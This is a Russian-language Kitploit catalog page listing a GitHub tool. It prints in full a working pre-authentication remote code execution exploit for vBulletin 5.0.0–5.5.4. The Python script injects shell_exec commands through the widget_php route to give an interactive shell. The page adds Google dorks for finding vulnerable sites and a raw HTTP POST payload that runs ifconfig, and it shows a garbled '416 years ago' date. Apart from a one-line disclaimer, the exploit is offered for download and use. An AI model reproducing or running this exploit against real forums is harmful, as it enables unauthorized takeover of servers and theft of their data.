Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
vBulletin-5.x-0day-pre-auth-RCE-exploit — Эксплойт удалённого выполнения кода без предварительной аутентификации для vBulletin 5.x (версии 5.0.0–5.5.4). Предоставляет shell через виджет widget_php. Используйте только для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/ianxtianxt/vbulletin-5.x-0day-pre-auth-rce-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubianxtianxt/vbulletin-5.x-0day-pre-auth-rce-exploit

vBulletin-5.x-0day-pre-auth-RCE-exploit

Эксплойт удалённого выполнения кода без предварительной аутентификации для vBulletin 5.x (версии 5.0.0–5.5.4). Предоставляет shell через виджет widget_php. Используйте только для авторизованного тестирования безопасности.

Репозиторий
416 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

vBulletin-5.x-0day-pre-auth-RCE-exploit

Затронутые версии: vBulletin 5.0.0~5.5.4

PoC ниже:

root@kitploit:~
#!/usr/bin/python

#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
   sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])

params = {"routestring":"ajax/render/widget_php"}

while True:
    try:
         cmd = raw_input("vBulletin$ ")
         params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
         r = requests.post(url = sys.argv[1], data = params)
         if r.status_code == 200:
              print r.text
         else:
              sys.exit("Exploit failed! :(")
    except KeyboardInterrupt:
         sys.exit(" Closing shell...")
    except Exception, e:
         sys.exit(str(e))

POST / HTTP/1.1 Host: * Content-Type: application/x-www-form-urlencoded Content-Length: 108

routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27ifconfig%27%29%3B+exit%3B

Скачать инструмент